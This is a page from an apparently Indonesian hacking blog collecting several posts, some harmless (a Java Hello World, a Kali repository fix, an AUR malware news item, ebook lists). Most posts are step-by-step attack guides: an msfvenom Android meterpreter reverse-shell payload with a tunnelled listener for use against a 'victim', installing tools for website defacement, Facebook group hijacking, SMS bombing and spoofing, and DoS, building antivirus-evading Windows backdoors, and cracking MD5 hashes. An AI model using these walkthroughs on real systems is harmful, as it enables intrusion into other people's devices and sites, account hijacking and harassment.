News Ticker

Latest Posts

Crack / Decrypt MD5 Hashes using Rainbow Table

- Tuesday, August 7, 2018 No Comments

Crack / Decrypt MD5 Hashes using Rainbow Table

Crack / Decrypt MD5 Hashes using Rainbow Table

Crack / Decrypt MD5 Hashes using Rainbow Table

Hello everyone, in this tutorial, i would like to give method how to crack, encrypt MD5 hashes using rainbow table.

What is Rainbow Table ?

rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a password (or credit card numbers, etc.) up to a certain length consisting of a limited set of characters. It is a practical example of a space–time tradeoff, using less computer processing time and more storage than a brute-force attack which calculates a hash on every attempt, but more processing time and less storage than a simple lookup table with one entry per hash. Use of a key derivation function that employs a salt makes this attack infeasible.
source : Wikipedia


so.. we can conclude what is rainbow table by this image :


Confused ? yha haha same with me, lol.
Alright, you will understand after watching this video :


Let's start

OK, after you read the explanation, watch that video... so it's time to try it.


1. Download RainbowCrack from https://project-rainbowcrack.com/

If you use Windows, choose for Windows,
If you use Linux, choose for windows, hahah i mean Linux
In this tutorial, im using Rainbow Crack for Linux.

2. After Downloaded, unzip the Rainbow and go to that directory, see :


Crack / Decrypt MD5 Hashes using Rainbow Table


Not allow for execute the script ? type this command :
chmod +x rcrack rtgen rtsort

Now we have access to execute that script/program.
Waitt..... before running rtcrack script like that videos, you must have Rainbow Table first :).

Creating Rainbow Tables

Alright, before your create Rainbow Tables, you should see charset.txt, like this one :


Understand it ? must !

numeric                    = [0123456789]
alpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
alpha-numeric          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
loweralpha                = [abcdefghijklmnopqrstuvwxyz]
loweralpha-numeric = [abcdefghijklmnopqrstuvwxyz0123456789]
mixalpha                  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-numeric    = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ascii-32-95                  = [ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~]
ascii-32-65-123-4            = [ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`{|}~]
alpha-numeric-symbol32-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
If you are lazy to create Rainbow table (it can take your times and make your computer hot)
you can download from my repository :

https://github.com/maxteroit/RainbowTable-alpha

or clone from my repository, use this command :
git clone https://github.com/maxteroit/RainbowTable-alpha.git 
 After cloning my repo, move all file (exc Readme.md) to directory which you save the Rainbowcrack files.

How to create Rainbow Table ?

Start creating Rainbow Table, use this command :
In here, im creating alpha charset for my rainbow table...
./rtgen md5 alpha 1 7 0 2100 8000000 all
The command means having the md5 hash type , plaintext length range 1 - 7, plaintext total 8353082582.

On process..


You can change plaintext range, plaintext total :).
If it done, you must short the rainbow table first, like this :
./rtsort .


 Ok, after that, run ./rcrack like the video, but wait, provide the md5 hash, or you can use my md5 :
ea1a3df96ef7de460929eecb5c521bad
Let's check in hashkiller.co.uk that my md5 hash :)
and the result is :

Not Found :p

Let's crack with our Rainbow Table and Rainbow Crack :D

Start cracking / decrypting MD5

Use this command :
./rcrack . -h ea1a3df96ef7de460929eecb5c521bad

Andd the result is.... CRACKEDDDD DECRYPTEDDD



Atasi Session Died di Metasploit dan Koneksi VPN yang Tidak Stabil

- Wednesday, July 25, 2018 No Comments
Hacking aringan WAN menggunakan portmap.io
Karena banyak yang bertanya pada Fans Page Maxteroit, yang belum like FP Maxteroit like dulu ya Maxteroit  hehehe, Salah satu pertanyaannya "Bang ko session died mulu ya gimana cara atasinya bang"

Artikel kali ini saya ambil dari salah satu Blog partner kami yaitu Tutorial Termux yang berfokus pada linux di Android yaitu Termux. Tapi untuk cara atasi session died di metasploit sama saja seperti di distro Linux lainnya.
Lansung saja baca dengan santai, jangan lupa sediakan kopi dan rokok :D

Karena sebagian besar ISP tidak menyediakan port forwarding, peretasan pada WAN selalu menjadi tugas yang sulit beberapa tahun lalu. Kemudian, SSH tunneling dan Premium VPN datang sebagai alternatif untuk Port Forwarding dan memungkinkan peretas meretas WAN.

Server Ngrok sebagai penyedia tunneling SSH terkemuka, tetapi masalah dengan mereka adalah kurangnya ketekunan. Setiap kali saat Anda tersambung kembali, Anda akan diberikan subdomain acak.

Untuk mengatasi hal ini, Serveo.net hadir dengan fitur "Subdomain Unik" yang memungkinkan pengguna untuk memilih subdomain mereka sendiri. Padahal, Serveo.net tidak mencapai banyak seperti ngrok lakukan.

Masalah dengan VPN berbayar adalah biaya mereka. Meskipun mereka menyediakan fasilitas port forwarding, biayanya lebih mahal. Sekarang, Portmap.io com menawarkan konfigurasi pemetaan port gratis yang dapat digunakan dengan Open VPN untuk penerusan port dan melakukan pengujian Penetrasi melalui WAN.

Hal-hal yang Anda perlukan sebelum melanjutkan:


Hack WAN Tanpa Port Forwarding menggunakan Portmap.io:
Create New Configuration
  • Setelah login, click "Create New Configuration"
Portmap.io Configuration
  • Pilih nama untuk konfigurasi Anda. (Dalam olan gratis portmap.io, Anda dapat mengonfigurasi hanya satu pemetaan saja. Anda harus membayar dan berlangganan untuk lebih banyak lagi)
  • Tipe default adalah "Open VPN"
  • Ubah protokol menjadi "TCP" jika berada di UDP secara default.
  • Sekarang, klik "Generate" untuk menghasilkan file konfigurasi
  • Setelah itu, Unduh file konfigurasi.
  • Setelah mengunduh, klik "Create" untuk membuat file. (Anda dapat mengunduh sebelum pembuatan)
Configuration Successfully
  • Sekarang berhasil membuat file konfigurasi, Beralih ke "Mapping Rules" dan klik "Crate New Rules"
  • Sekarang, konfigurasikan Aturan seperti yang diberikan pada gambar di bawah ini
port forwarding di portmap.io
  • Semua nilai akan diisi secara default, yang harus Anda lakukan hanyalah memilih port untuk diteruskan.
  • Disini, saya memilih untuk meneruskan port 4444. Anda dapat memilih port Anda sendiri.
  • Setelah memasukkan port pilihan Anda, Klik "create" untuk membuat Maping Rules.
  • Dalam pembuatan payload, "humanerror666-51596.portmap.io" akan berfungsi sebagai Lhost dan 51596 akan berfungsi sebagai Lport.
  • Untuk Android buka aplikasi OpenVPN,

  •  Clik OVPN Profile
  • lalu buka file ovpn yang telah anda unduh tadi. Klik Import
  • Lalu ADD
  • Dan Connect-kan tombolnya berasa di bawah tulisan DISCONNECTED

  • Sekarang, koneksi vpn akan dimulai dan Anda akan terhubung ke vpn.

  • Untuk membuat payload dengan msfvenom, ketik, 
  • $ msfvenom -p android/meterpreter/reverse_tcp LHOST = humanerror666-51596.portmap.io LPORT = 51596 R> sdcard/nama_payload.apk
  • Setelah sukses membuat payload, untuk membuat listener di Metasploit, ketik
  • $ use exploit/multi/handler
  • set payload /android/meterpreter/reverse_tcp
  • set lhost humanerror666-51596.portmap.io 
  • set lport 4444
  • exploit 
  • Sekarang, eksploit akan berhasil diluncurkan dan Anda akan mendapatkan listener setelah payload yang Anda buat telah dieksekusi oleh korban.

Kelebihan menggunakan Portmap.io adalah Anda tidak akan lagi mengalami session died dan Anda tidak perlu mensetting ulang payload untuk mendapatkan listener.

Jika Anda memiliki pertanyaan, Silahkan beri komentar di Artikel ini. Share Artikel ini jika Anda suka :D Terimakasih .

Catatan : Untuk OpenVPN-nya gunakan OpenVPN dari repositories. Jika belum ada silahkan ikuti saja perintahnya :
apt-get install openvpn
Lalu load file ovpn tadi dengan perintah
openvpn <nama config config file>

Berkenalan Dengan Bahasa Pemrograman Java

- Monday, July 23, 2018 No Comments

Berkenalan Dengan Bahasa Pemrograman Java

Berkenalan Dengan Bahasa Pemrograman Java

Ok guys, kali ini Maxteroit bakalan bahas soal Programming, khususnya bahasa Java.


Mengapa memilih java?




1. Java Itu Mudah Dipelajari

Saya sebelumnya sudah merasakan bahasa-bahasa pemrograman yang lain, dan jujur jika dibandingkan dengan Java, bahasa-bahasa yang saya pelajari seperti Python, Pascal, C++, VB, nodeJS (untuk Web), PHP (untuk Web), bahasa java-lah yang menurut saya mudah, hanya kurang lebih 2 bulan, saya sudah menguasai fundamental dari java ini, (mungkin terhitung lama untuk beberapa orang), dan itu bagi saya sendiri adalah cepat :'D.


2. Java Adalah Bahasa Yang Berorientasikan Objek

Java Adalah Bahasa Yang Berorientasikan Objek atau biasa disebut dengan istilah OOP (Object Oriented Programming). Mengembangkan bahasa berbasis OOP ini jauh lebih mudah, fleksibel, dan ekstensibel. Konsep-konsep seperti Abstraksi, Enkapsulasi, Polimofisme, dan Pewarisan yang digunakan oleh Java sangatlah membantu para programmer untuk menyelesaikan projeknya :D.


3. Development Tools Yang Powerful

 Eclipse dan Netbeans telah memainkan peran besar untuk menjadikan Java sebagai salah satu bahasa pemrograman terbaik. IDE ini memiliki kemampuan debugging yang kuat, yang sangat penting dalam hal development. Integrated Development Environment (IDE) ini membuat pengembangan Java lebih mudah, lebih cepat dan lancar.

Dan masih banyak lagi keunggulan-keunggulan java dibandingkan bahasa-bahasa lain :D.




Yang Perlu Disiapkan Sebelum Memulai Java


1. IDE-nya, bisa menggunakan Eclipse atau Netbeans, atau mungkin hanya notepad biasa :D
Untuk Netbeans, bisa didownload di link berikut ===>  NetBeans
Varian rasanya bisa dipilih sesuai selera :D
Untuk Eclipse, bisa didownload di link berikut ===>  Eclipse

2. JDK (Java Development Kit), yaitu bahan pokok-nya untuk programming Java,
Bisa didownload di link berikut ===>  JDK
Sesuaikan Dengan Sistem Operasi masing-masing.


Start with Hello World!

Saya asumsikan kalo sobat sudah menginstall JDK dan IDE nya (Eclipse maupun NetBeans).
Dan disini saya menggunakan NetBeans.. ok kita mulai, kita buka NetBeans-nya terlebih dahulu

(tampilan awal NetBeans)

Baik jika sudah seperti itu, kita klik File yang ada di bagian pojok kiri atas lalu pilih New Project, lalu akan muncul window baru seperti ini :


Kita pilih Categories Java dan Project Java Application, lalu next..


Untuk Project Name dan Projcet Location diisi bebas, sesuai keinginan,
Lalu kita Ceklis aj yang Create Main Class, bisa diatur sendiri nama Main Classnya (Class utama yang memiliki Main method).

Maksud dari Main Class tersebut adalah Class yang memiliki Method "main" :
public static void main(String [] args).

Lalu kita klik Finish saja, dan muncul lah area Koding kita :D, 

Penjelasan : 

package javaapplication20 : adalah nama package dari program yang kita buat
public class JavaApplication20 { : adalah nama Class dari program yang kita buat
public static void main(String [] args){ : adalah Main Method (Method Utama) dari program kita, dimana Main Method adalah method yang akan dicari dan dieksekusi pertama kali oleh Sistem Operasi kita atau dengan kata lain yaitu dieksekusi oleh komputer kita, jadi jika tidak ada Main Method tersebut, program yang kita buat tidak akan pernah dieksekusi oleh komputer.

Memulai dengan print Hello World

Baik, didalam Method Main tersebut, sobat ketikkan seperti berikut :
System.out.println("Hello World");

Sehingga menjadi seperti ini :

Lalu kita Save, dan Run, tombol Run ada diatas aplikasi NetBeans ini, yang memiliki Icon PLAY berwarna hijau, jika berhasil, maka output program akan muncul seperti berikut :



Selesai sudah program Hello World kita :D,
jgn lupa subscribe Blog ini yha, agar tidak ketinggalan Materi yang kami share :D

Terima Kasih

Fix Repository Kali Linux Rolling 2018

- Tuesday, July 17, 2018 1 Comment

Fix Repository Kali Linux Rolling 2018

Fix Repository Kali Linux Rolling 2018

Makin sini developer Kali Linux OS terus menerus melakukan perkembangan terhadap OS Kali Linux in, dari segi interfaces, penambahan & pengurangan tools, dan tidak lepas juga dengan repositori-nya.

Berbicara mengenai reporsitory, saya melihat ada masalah tentang repository yang tidak berjalan/tidak berfungsi, khususnya semenjak ada versi Kali linux terbaru yaitu 2018.1 (dan sekarang ada yang 2018.2).




Berikut pembeberan masalahnya :

Disini saya menggunakan Kali linux 2018.2, dan menggunakan Repo default (bawaan) :
deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
Dan akan mencoba untulk menginstall figlet, berikut hasilnya :


OK, disana kita dapat lihat bahwa ada instruksi untuk melakukan update, lihat apa yang terjadi :


Tetep Error....

Ok langsung saja kita ke fixing masalahnya :


Sederhana saja, kita hanya mengetikkan 1 Huruf saja di 2 baris repository kita nanti, yha hanya 1 huruf, sebagai berikut :

Buka dulu file sources.list nya, bisa menggunakan nano, vim, leafpad, gedit, dll.

nano /etc/apt/sources.list

Yang awalnya :
deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

Kita ubah menjadi :
deb https://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src https://http.kali.org/kali kali-rolling main contrib non-free

1 huruf yang dimaksud adalah ditempatkan dibagian http , maka jadi https .
 Ok kita coba lakukan update...

apt-get update

and Sukses


Dengan begitu, install package apapun yang tersedia di Repository tersebut kembali bisa seperti sebelumnya :D
Simpel :D

Sekian saja postingan ini, jika berkenan memberikan donasi, anda bisa nganuin ikl@an  yang terpasang di blog ini :'D  >>>>>>




Terima Kasih

How To Hack Website Easily

- Sunday, July 15, 2018 No Comments
How To Deface Website Easily With Termux

You want to deface a website but do not have any language programming skills?

Don't worry. You can deface website easily using termux with BadMod tool.

BadMod auto exploit tool V2


How To Deface Website Easily With Termux

- Vulnerabilties Scanner
- Dorking
- Cms Detector
- Auto Exploit : 

Installation

$ pkg update && update 
$ pkg install git php curl nano 
$ git clone https://github.com/MrSqar-Ye/BadMod 
$ cd BadMod 
$ nano BadMod.php

Delete this code, see the image

to be, see the image

And save, press ctrl+x and type Y, hit the enter

Run the tools using command :
$ php BadMod.php
Choose the number whatever you want

If you want to dorking use this command :



$ php Dorker.php
sumber :  http://www.termux-tutorial.ga/2018/07/how-to-deface-website-easily-with-termux.html

Malware found in Arch Linux AUR Repository

- No Comments

Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code was immediately removed when the AUR team intervened. The incident occurred because the AUR team allow users to contribute to repositories that have been abandoned by their original authors.

The repository has user-submitted packages, and that is how the malware was released in the repository. A user named “xeactor” took over an ‘orphaned’ package on Saturday going by the name of “acroread” which functions as a PDF viewer and added a malicious code.

As per Git commit, “Xeactor” added a code that would download a script named “~x” from ptpb.pw a lightweight package that allows users to share tiny pieces of text files, which in turn would execute another file named “~u”. The software meddles with “systemd” and reconfigure it. This script would run every 360 seconds.

The purpose of the second file (~u) was to collect data about each infected system including date, time, machine’s ID, package manager details, CPU information and outputs of “uname-a” and “systemctl list-units” commands and post these details inside a new Pastebin file, using the attacker's custom Pastebin API key.

The AUR team have also said they have found similar code in other packages:

▬ acroread 9.5.5-8

▬ balz 1.20-3

▬ minergate 8.1-2

The malicious code changes were reversed and xeactor’s accounts were suspended. The AUR packages are user-submitted packages to the Arch Linux Repo. There are a lot of cases this year where most of the code of the operating system has been affected by some sort of malware.

No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

Even though it does not pose any serious threat to the infected computers, it is anticipated that “xeactor” could launch another malware as any self-update mechanism was not included.

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 2

- Saturday, July 14, 2018 1 Comment

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2




Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 akhirnya saya post :D dan yang pasti masih berhubungan dengan judul yang saya cantumkan diatas yha :D.

Link Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 :


https://www.maxteroit.com/2018/07/kumpulan-ebook-hacking-programming-networking-blogging-security.html

Seperti biasa, pemanis....

(Google Haking For Penetration Testing - 529 Pages)



(Metasploit Penetration Testing Cookbook - 269 Pages)



Oke berikut list Ebook Koleksi babang Maxteroit Part 2 :


2. Google Secrets - How To Get A Top 10 Ranking - 112 Pages

3. Gray Hat Hacking - 721 Pages

4. Metasploit The Penetration Testers Guide - 332 Pages

5. Nmap 6_ Network Exploration and Security Auditing Cookbook - 318 Pages

6. Nmap Essentials - 118 Pages

7. nmap-cookbook-the-fat-free-guide-to-network-scanning - 198 Pages

8. Penetration Testing with the Bash shell - 151 Pages

9. PHP for Absolute Beginners, 2nd Edition - 236 Pages

10. Practical Malware Analysis - 802 Pages

11. Practical Reverse Engineering - 383 Pages

12. The Art of Memory Forensics - 914 Pages

13. Windows Sysinternals Administrators Reference - 497 Pages

14. windows-command-line-administration - 578 Pages


Nah Mungkin baru segitu dulu saja koleksi Ebook saya yang bisa share dipost ini..
Dan di post selanjutnya, saya akan share Ebook mengenai Ethical Hacking
Jangan sungkan untuk bertanya atau meminta sesuatu pada saya :D , sobat bisa hubungi saya ke email === > adittya@maxteroit.com
Terima Kasih  

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1

- Monday, July 9, 2018 1 Comment

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1



Ebook mengenai Hacking, Programming, Networking & Security sudah bertebaran di Internet, yap seperti di Blog Ini :D Maxteroit tercinta. Berhubungan banyak yang request mengenai Upload Ebook-ebook yang saya punya :'D  (permintaan dari teman FB) , dengan begitu saya dengan senang hati share koleksi-koleksi ebook yang saya punya, berikut screenshotnya :

(GrayHat Hacking-721 pages)


(Practical Reverse Engineering-383 pages)


Nah itu baru secuil aj :D, 
Berikut Nama sekaligus Linknya :














Penasaran dengan 2 Sampel diatas bukan ? 
tunggu di update-an selanjutnya yha, jgn lupa subscribe, atau jika ingin minta langsung, bisa hubungi saya via email =====> adittya@maxteroit.com

Untuk part 1, segitu dulu yha :'p
thx

Cara Santet Online Paling Ampuh

- Sunday, July 8, 2018 No Comments

Cara Santet Online Paling Ampuh



Cara Santet Online


Pada artikel kali ini saya akan memberikan tutorial cara install tools santet online di termux, Tools santet online ini adalah tools yang di buat oleh akun github Gameye98. Tools ini dbuat untuk berbagai macam keperluan seperti berikut:
- Create a Netcat Payload and Listener
- Facebook Group Hijack Attack
- SMS Bomber Attack Vectors
- SMS Spoof Attack Vectors
- Denial-of-Service Attack

Baca Juga : Install Web Server di Termux

  • Update dan upgrade termux dengan perintah
  • $ apt update && upgrade
  • Karena tools Santet Online ini menggunakan bahas pemrograman python, maka kalian harus mengintall python terlebih dahulu
  • $ apt istall python2
  • Install juga git dengan perintah
  • $ apt install git
  • Selanjutnya kalian tinggal mengclone tools nya dari github dengan perintah
  • $ git clone https://github.com/Gameye98/santet-online
  • Tunggu sampai proses cloning selesai, Kemudian masuk ke directory Santet Online
  • $ cd santet-online
  • Sekarang kalian tinggal menjalankan tools nya dengan perintah berikut
  • $ python2 santet.py
  • Ada lima pilihan dari 01-05, kalian tinggal memilih yang mana yang akan kalian gunakan
Sekian tutorial cara install tools santet online di termux, Terima kasih telah berkunjung di blog Android Tutorialku.
Jika kalian mengalami kendala silahkan bertanya di kolom komentar.
Selamat mencoba dan Semoga bermanfaat.....

SUMBER : https://www.termux-tutorial.ga/2018/07/cara-santet-online.html


Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)

- Saturday, April 14, 2018 2 Comments

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Jika sebelumnya saya bahas hack windows  dengan msfvenom biasa (tanpa bantuan apapun, tapi kali ini saya akan share tutorial bagaimana Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD).

Baca Juga :
Cara Membuat Backdoor Fud Menggunakan Veil-Evasion
Hack Windows Beda Jaringan Menggunakan Metasploit 

Oke langsung saja ke tutorial utamanya, cekidot.....

Download terlebih dahulu zirikatunya di github, bisa clone, bisa juga didownload langsung (dalam format zip) di link berikut
https://github.com/pasahitz/zirikatu

Jika sudah didownload, silahkan ekstrak file zirikatunya tadi, lalu buka folder yg sudah diekstrak menggunakan terminal, seperti berikut.....


Lalu jalankan tool Zirikatunya :


Disana terdapat beberapa pilihan, bisa kalian coba-coba sendiri, disini saya memilih pilihan yang nomor 3, yaitu Meterpreter_Reverse_https

Selanjutnya :
Set LHOST-nya, karena disini hanya jangkauan lokal, kita gunakan ip lokal kita, bisa dilihat dengan menggunakan perintah
ifconfig

Lalu set LPORT kita, kalian bisa set bebas berapapun angkanya, (karna lokal).
Untuk langkah  selanjutnya, bisa menyesuaikan....


Nah disana ada pertanyaan blablabla, kita yes kan saja, agar langsung masuk ke msfconsole dan si Zirikatunya sendiri sudah men-set sesuai dengan payload yang sudah kita buat, kita hanya tinggal menjalankan backdoornya di OS korban :D

Ok kita jalankan backdoornya..

(Sebelum Backdoor dieksekusi)

(Sesudah Dieksekusi).

Untuk lebih jelasnya, bisa disimak langsung lewat video berikut :

link =====> https://www.youtube.com/watch?v=i8cInI46fRQ



Ok sekian saja tutor saya :D ,
ouh iyha, untuk yang beda jaringan-nya akan menyusul, masih banyak tugas kuliah xixixixi.